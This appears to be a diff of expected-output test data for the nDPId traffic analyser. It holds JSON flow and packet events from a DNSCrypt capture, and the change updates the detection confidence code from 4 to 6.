+00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":41,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304363,"flow_last_seen":946739304363,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739304363,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.238.186.192","src_port":56997,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00224{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":42,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739304363} 
00419{"packet_event_id":1,"packet_event_name":"packet","packet_id":42,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739304363,"pkt":"REREREREZmZmZmZmCABFAABQylIAub0RTiYKAAABaO66wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00602{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":43,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304363,"flow_last_seen":946739304363,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739304363,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.238.186.192","src_port":39655,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
01141{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":946739304363,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739304363,"pkt":"REREREREZmZmZmZmCABFAAIcylNAAL0RDRIKAAABaO66wJrnAbsCCOaEZFYBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAF2CGRuc2NyeXB0AnVrAAAQAAEAAAAAAAAAAAABxgAMAcIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":43,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304363,"flow_last_seen":946739304363,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739304363,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.238.186.192","src_port":39655,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":43,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304363,"flow_last_seen":946739304363,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739304363,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.238.186.192","src_port":39655,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00602{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":44,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304363,"flow_last_seen":946739304363,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739304363,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.238.186.192","src_port":59261,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
01141{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":946739304363,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739304363,"pkt":"REREREREZmZmZmZmCABFAAIcylVAAL0RDRAKAAABaO66wOd9AbsCCOaEZFQBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAF2CGRuc2NyeXB0AnVrAAAQAAEAAAAAAAAAAAABxgAMAcIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":44,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304363,"flow_last_seen":946739304363,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739304363,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.238.186.192","src_port":59261,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":44,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304363,"flow_last_seen":946739304363,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739304363,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.238.186.192","src_port":59261,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00606{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":45,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304363,"flow_last_seen":946739304363,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739304363,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.238.186.192","src_port":59641,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02424{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":45,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":946739304363,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739304363,"pkt":"REREREREZmZmZmZmCABFAAXcylYgAL0RKU8KAAABaO66wOj5AbsGBMBOZFcBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAF2CGRuc2NyeXB0AnVrAAAQAAEAAAAAAAAAAAAFwgAMBb4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":45,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304363,"flow_last_seen":946739304363,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739304363,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.238.186.192","src_port":59641,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":45,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304363,"flow_last_seen":946739304363,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739304363,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.238.186.192","src_port":59641,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
00606{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":46,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304363,"flow_last_seen":946739304363,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739304363,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.238.186.192","src_port":44491,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02424{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":46,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":946739304363,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739304363,"pkt":"REREREREZmZmZmZmCABFAAXcylQgAL0RKVEKAAABaO66wK3LAbsGBPuAZFMBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAF2CGRuc2NyeXB0AnVrAAAQAAEAAAAAAAAAAAAFwgAMBb4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":46,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304363,"flow_last_seen":946739304363,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739304363,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.238.186.192","src_port":44491,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":46,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304363,"flow_last_seen":946739304363,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739304363,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.238.186.192","src_port":44491,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00224{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":47,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739304363} 00419{"packet_event_id":1,"packet_event_name":"packet","packet_id":47,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739304363,"pkt":"REREREREZmZmZmZmCABFAABQylQAub0RTiQKAAABaO66wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00224{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":48,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739304363} 
@@ -119,26 +119,26 @@ 00706{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":56,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":946739304399,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":226,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":226,"pkt_l4_len":192,"thread_ts_msec":946739304399,"pkt":"ZmZmZmZmRERERERECABFAADUET5AADQRUHBo7rrACgAAAQG76PkAwCm6ZFeBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAF2CGRuc2NyeXB0AnVrAAAQAAHADAAQAAEAAHCAAH18RE5TQwACAAAhKdWfhZK3D+gyCT1iixW\/FSRGoXDftkwga2BkZlttUlKSV94EyK2+BzaupeI4vEl+rXXsyVAmoCDcu2+5DAsD7Asxq95SKQwdQwh70VVdkKEIfYOFTawzG9XuIku9iynsCzGr3lIpDAAAAAFfU3cYX1TImA=="} 00601{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":57,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304599,"flow_last_seen":946739304599,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739304599,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":32793,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
01141{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":57,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":946739304599,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739304599,"pkt":"REREREREZmZmZmZmCABFAAIcZhNAAL0R0ewKAAAB0frxGYAZAbsCCIXq8VkBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAhtZWdhbmVyZAAAEAABAAAAAAAAAAAAAcsADAHHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":57,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304599,"flow_last_seen":946739304599,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739304599,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":32793,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":57,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304599,"flow_last_seen":946739304599,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739304599,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":32793,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00605{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":58,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304599,"flow_last_seen":946739304599,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739304599,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":56035,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
